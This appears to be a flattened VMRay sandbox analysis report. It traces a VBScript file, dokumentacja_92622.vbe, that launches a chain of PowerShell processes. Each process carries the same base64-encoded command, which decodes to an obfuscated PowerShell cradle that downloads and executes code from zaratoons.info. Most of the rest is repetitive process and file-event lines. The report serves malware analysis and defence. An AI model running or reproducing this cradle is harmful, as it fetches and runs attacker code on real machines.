VMRay Analyzer Report for Sample #632978
VMRay Analyzer
3.0.1
URI
zaratoons.info
Resolved_To
Address
212.73.150.207
Process
1
2880
cscript.exe
1116
cscript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\5P5NRG~1\Desktop\dokumentacja_92622.vbe"
C:\Windows\system32\
c:\windows\system32\cscript.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
3
1960
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
4
2060
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
5
2052
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
6
1416
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
7
1972
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
8
1868
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
9
200
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
10
1204
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
11
2436
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
12
2336
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
13
2548
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
14
2556
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
15
2620
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
16
2192
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
17
2428
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
18
1560
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
19
1444
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
20
2140
powershell.exe
2880
powershell.exe
